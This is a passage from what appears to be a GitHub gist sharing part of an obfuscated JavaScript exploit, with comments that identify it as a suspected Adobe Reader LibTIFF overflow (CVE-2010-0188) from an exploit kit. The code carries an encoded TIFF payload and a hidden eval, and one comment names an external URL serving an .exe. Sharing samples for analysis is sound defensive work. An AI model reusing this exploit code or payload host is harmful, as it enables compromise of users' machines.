_j9 = _I2('QUFB', 10984);
_ll0 = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
_ll1 = _j8 + _j9 + _ll0 + _j5;
_ll2 = _ji1(_j7, '');
if (_ll2.length % 2) _ll2 += unescape('%00');
_ll3 = _j2(_ll2);
with({
k: _ll3
}) _I0(k);
qwe123b.rawValue = _ll1
}
_j3();
@scottschiller
Copy link
Author

Bonus amusement: Note how "eval" is sort-of-cleverly-hidden in the encoded HTML bit.

@scottschiller
Copy link
Author

Suspected Adobe Libtiff integer overflow in Reader and Acrobat, per http://wepawet.cs.ucsb.edu/view.php?type=js&hash=1396118ca588eb5e166abc947d447bed&t=1330933988
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188

@CapCap
Copy link

CapCap commented Mar 22, 2012

This is defunct I'm guessing, as it tries to load " http://attitude-tees.com/images/1.exe ", which has been since taken down apparently, and seems to have been down for at least a day. While this specific one seems to be maybe a ripped off version, in general these seem to be blackhole xplt pack, ala http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/5287.statistics.png :-)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment